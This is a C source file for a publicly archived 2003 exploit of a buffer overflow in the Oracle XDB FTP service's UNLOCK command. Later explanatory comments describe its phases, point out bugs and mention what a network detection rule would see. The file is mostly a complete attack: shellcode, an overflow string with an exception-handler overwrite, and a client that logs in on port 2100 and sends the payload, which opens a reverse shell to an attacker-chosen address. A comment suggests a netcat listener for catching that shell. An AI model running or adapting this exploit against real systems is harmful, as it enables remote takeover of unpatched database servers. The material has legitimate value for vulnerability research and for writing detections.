/* Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit */
/* David Litchfield from ngssoftware (at Blackhat 2003)*/
/* Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit */
/* David Litchfield from ngssoftware (at Blackhat 2003)*/
/* */
/* Original Advisory : */
/* http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf */


#include <stdio.h>
#include <windows.h>
#include <winsock.h>

/* Forward declarations for the three phases of the program:
 * Winsock setup + target resolution (StartWinsock), patching the
 * connect-back address into the payload (SetUpExploit), and the
 * FTP session that delivers the request (GainControlOfOracle). */
int GainControlOfOracle(char *, char *);
int StartWinsock(void);
int SetUpExploit(char *,int);

/* File-scope state shared between StartWinsock() and GainControlOfOracle(). */
struct sockaddr_in s_sa;   /* target address; sin_port is set to 2100 just before connect() */
struct hostent *he;        /* gethostbyname() result, or a non-NULL sentinel for numeric hosts */
unsigned int addr;         /* numeric target address from inet_addr() (INADDR_NONE is not checked) */
char host[260]="";         /* target host copied from argv[1]; at most 250 bytes are copied */

/* Payload appended to the request by main() after short_jump and
 * exception_handler. SetUpExploit() patches it in place before it is sent:
 * bytes 191-194 receive the connect-back IPv4 address and bytes 209-210
 * the connect-back TCP port (stored XOR 0xFFFF). Nothing else in this file
 * reads or interprets these bytes. */
unsigned char exploit[508]=
"x55x8BxECxEBx03x5BxEBx05xE8xF8xFFxFFxFFxBExFFxFF"
"xFFxFFx81xF6xDCxFExFFxFFx03xDEx33xC0x50x50x50x50"
"x50x50x50x50x50x50xFFxD3x50x68x61x72x79x41x68x4C"
"x69x62x72x68x4Cx6Fx61x64x54xFFx75xFCxFFx55xF4x89"
"x45xF0x83xC3x63x83xC3x5Dx33xC9xB1x4ExB2xFFx30x13"
"x83xEBx01xE2xF9x43x53xFFx75xFCxFFx55xF4x89x45xEC"
"x83xC3x10x53xFFx75xFCxFFx55xF4x89x45xE8x83xC3x0C"
"x53xFFx55xF0x89x45xF8x83xC3x0Cx53x50xFFx55xF4x89"
"x45xE4x83xC3x0Cx53xFFx75xF8xFFx55xF4x89x45xE0x83"
"xC3x0Cx53xFFx75xF8xFFx55xF4x89x45xDCx83xC3x08x89"
"x5DxD8x33xD2x66x83xC2x02x54x52xFFx55xE4x33xC0x33"
"xC9x66xB9x04x01x50xE2xFDx89x45xD4x89x45xD0xBFx0A"
"x01x01x26x89x7DxCCx40x40x89x45xC8x66xB8xFFxFFx66"
"x35xFFxCAx66x89x45xCAx6Ax01x6Ax02xFFx55xE0x89x45"
"xE0x6Ax10x8Dx75xC8x56x8Bx5DxE0x53xFFx55xDCx83xC0"
"x44x89x85x58xFFxFFxFFx83xC0x5Ex83xC0x5Ex89x45x84"
"x89x5Dx90x89x5Dx94x89x5Dx98x8DxBDx48xFFxFFxFFx57"
"x8DxBDx58xFFxFFxFFx57x33xC0x50x50x50x83xC0x01x50"
"x83xE8x01x50x50x8Bx5DxD8x53x50xFFx55xECxFFx55xE8"
"x60x33xD2x83xC2x30x64x8Bx02x8Bx40x0Cx8Bx70x1CxAD"
"x8Bx50x08x52x8BxC2x8BxF2x8BxDAx8BxCAx03x52x3Cx03"
"x42x78x03x58x1Cx51x6Ax1Fx59x41x03x34x08x59x03x48"
"x24x5Ax52x8BxFAx03x3Ex81x3Fx47x65x74x50x74x08x83"
"xC6x04x83xC1x02xEBxECx83xC7x04x81x3Fx72x6Fx63x41"
"x74x08x83xC6x04x83xC1x02xEBxD9x8BxFAx0FxB7x01x03"
"x3Cx83x89x7Cx24x44x8Bx3Cx24x89x7Cx24x4Cx5Fx61xC3"
"x90x90x90xBCx8Dx9Ax9Ex8Bx9AxAFx8Dx90x9Cx9Ax8Cx8C"
"xBExFFxFFxBAx87x96x8BxABx97x8Dx9Ax9Ex9BxFFxFFxA8"
"x8CxCDxA0xCCxCDxD1x9Bx93x93xFFxFFxA8xACxBExACx8B"
"x9Ex8Dx8Bx8Ax8FxFFxFFxA8xACxBExACx90x9Cx94x9Ax8B"
"xBExFFxFFx9Cx90x91x91x9Ax9Cx8BxFFx9Cx92x9BxFFxFF"
"xFFxFFxFFxFF";

/* The FTP request that triggers the overflow: the "UNLOCK /" verb followed
 * by a long run of repeated ASCII filler. main() appends short_jump,
 * exception_handler, exploit and a trailing space with strcat(); the
 * 8000-byte buffer leaves room for those.
 * From the network side this is what a detection rule sees: an FTP session
 * on TCP 2100 whose UNLOCK argument is hundreds of bytes of patterned text
 * rather than a path. */
char exploit_code[8000]=
"UNLOCK / aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnn"
"nooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyyzzzzAAAAAABBBBCCCCD"
"DDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSST"
"TTTUUUUVVVVWWWWXXXXYYYYZZZZabcdefghijklmnopqrstuvwxyzABCDEFGHIJK"
"LMNOPQRSTUVWXYZ0000999988887777666655554444333322221111098765432"
"1aaaabbbbcc";


/* Two short byte sequences concatenated after the filler by main(), in the
 * order short_jump then exception_handler, and followed by exploit[].
 * Judging by the names, exception_handler is the value that lands on the
 * overwritten exception-handler pointer and short_jump skips over it into
 * the payload — the overflow layout itself is not visible in this file. */
char exception_handler[8]="x79x9Bxf7x77";
char short_jump[8]="xEBx06x90x90";


/* Entry point.
 * argv[1] host       - Oracle XDB FTP target, copied into the global host[]
 * argv[2] userid     - FTP user name, passed to GainControlOfOracle()
 * argv[3] password   - FTP password, passed to GainControlOfOracle()
 * argv[4] ipaddress  - connect-back address patched into exploit[]
 * argv[5] port       - connect-back TCP port patched into exploit[]
 * Returns 0 on completion or after printing usage. On Winsock failure the
 * exit status is whatever printf() returned (a byte count), not an error code.
 * None of the argv strings are length-checked beyond the strncpy() on host. */
int main(int argc, char *argv[])
{
if(argc != 6)
{
printf(" Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit");
printf(" for Blackhat (http://www.blackhat.com)");
printf(" Spawns a reverse shell to specified port");
printf(" Usage: %s host userid password ipaddress port",argv[0]);
printf(" David Litchfield (david@ngssoftware.com)");
printf(" 6th July 2003 ");
return 0;
}
/* host[] is 260 bytes and zero-initialised, so copying at most 250 keeps it terminated. */
strncpy(host,argv[1],250);
if(StartWinsock()==0)
return printf("Error starting Winsock. ");
/* atoi() reports no errors; a non-numeric port silently becomes 0. */
SetUpExploit(argv[4],atoi(argv[5]));
/* Assemble the final request: filler, short jump, handler value, payload, space. */
strcat(exploit_code,short_jump);
strcat(exploit_code,exception_handler);
strcat(exploit_code,exploit);
strcat(exploit_code," ");


GainControlOfOracle(argv[2],argv[3]);
return 0;
}


/* Patch the connect-back address and port into exploit[] in place.
 * myip   - dotted-quad string converted with inet_addr(); a failed
 *          conversion (INADDR_NONE) is not detected and its bytes are
 *          written into the payload as-is
 * myport - TCP port, stored in network byte order and XORed with 0xFFFF
 * Always returns 0. */
int SetUpExploit(char *myip, int myport)
{
unsigned int ip=0;
unsigned short prt=0;
char *ipt="";
char *prtt="";


ip = inet_addr(myip);
ipt = (char*)&ip;
/* The four address bytes go to fixed offsets 191-194 of the payload. */
exploit[191]=ipt[0];
exploit[192]=ipt[1];
exploit[193]=ipt[2];
exploit[194]=ipt[3];
// set the TCP port to connect on
// netcat should be listening on this port
// e.g. nc -l -p 80

prt = htons((unsigned short)myport);
/* The port is stored inverted; presumably the payload undoes the XOR
 * (not visible here). Offsets 209-210 of the payload receive it. */
prt = prt ^ 0xFFFF;
prtt = (char *) &prt;
exploit[209]=prtt[0];
exploit[210]=prtt[1];
return 0;
}


/* Initialise Winsock 2.0 and resolve the global host[] into s_sa.
 * Returns 1 on success, 0 if WSAStartup() fails or reports a version
 * other than 2.0.
 * Defect: when host[] starts with a letter, gethostbyname() may return
 * NULL and the memcpy() below dereferences he before the NULL test at
 * the bottom runs, so an unresolvable name crashes instead of returning 0.
 * Defect: isalpha() is passed a plain char; a negative value is UB
 * (cast to unsigned char first). */
int StartWinsock() {
int err=0; WORD wVersionRequested;
WSADATA wsaData;
wVersionRequested = MAKEWORD( 2, 0 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 )
return 0;

if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
{ WSACleanup( );
return 0; }


if (isalpha(host[0])) {
/* Hostname: resolve, then copy h_length bytes of the first address. */
he = gethostbyname(host);
s_sa.sin_addr.s_addr=INADDR_ANY;
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
} else
{ addr = inet_addr(host);
s_sa.sin_addr.s_addr=INADDR_ANY;
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,&addr,4);
/* Non-NULL sentinel so the check below passes for numeric hosts;
 * an inet_addr() failure (INADDR_NONE) is not detected. */
he = (struct hostent *)1;
}
if (he == NULL) {
return 0; }
return 1; }


/* Open an FTP session to the XDB service on TCP 2100, log in, and send
 * the assembled exploit_code.
 * user, pass - FTP credentials; each is truncated to 230 bytes so the
 *              "user "/"pass " prefix, credential, space and NUL fit in 260
 * Returns 0 after the request is sent. On socket, connect or login failure
 * it returns printf()'s byte count (non-zero), not a defined error code.
 * Notes: recv() results are stored in rcv but never checked; resp is read
 * 1500 bytes into a zeroed 1600-byte buffer so "%s" always finds a
 * terminator; r_addr is filled in but never used. */
int GainControlOfOracle(char *user, char *pass) {
char usercmd[260]="user ";
char passcmd[260]="pass ";
char resp[1600]="";
int snd=0,rcv=0;
struct sockaddr_in r_addr;
SOCKET sock;


strncat(usercmd,user,230);
strcat(usercmd," ");
strncat(passcmd,pass,230);
strcat(passcmd," ");


sock=socket(AF_INET,SOCK_STREAM,0);
if (sock==INVALID_SOCKET)
return printf(" sock error");
r_addr.sin_family=AF_INET; r_addr.sin_addr.s_addr=INADDR_ANY;
r_addr.sin_port=htons((unsigned short)0);

/* XDB FTP listens on 2100; the address itself was resolved by StartWinsock(). */
s_sa.sin_port=htons((unsigned short)2100);
if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR) return printf("Connect error");
/* Banner, then USER and PASS; each reply is echoed and the buffer re-zeroed. */
rcv = recv(sock,resp,1500,0);
printf("%s",resp);
ZeroMemory(resp,1600);
snd=send(sock, usercmd , strlen(usercmd) , 0);
rcv = recv(sock,resp,1500,0);
printf("%s",resp); ZeroMemory(resp,1600);


snd=send(sock, passcmd , strlen(passcmd) , 0);
rcv = recv(sock,resp,1500,0);
printf("%s",resp);
/* A reply starting with '5' is treated as a login failure (FTP 5xx). */
if(resp[0]=='5')
{ closesocket(sock);
return printf("Failed to log in using user %s and password %s. ",user,pass);
}
ZeroMemory(resp,1600);
snd=send(sock, exploit_code, strlen(exploit_code) , 0);
/* Hold the connection open for 2 s before closing; no reply is read. */
Sleep(2000);
closesocket(sock);
return 0;
}

// milw0rm.com [2003-08-13]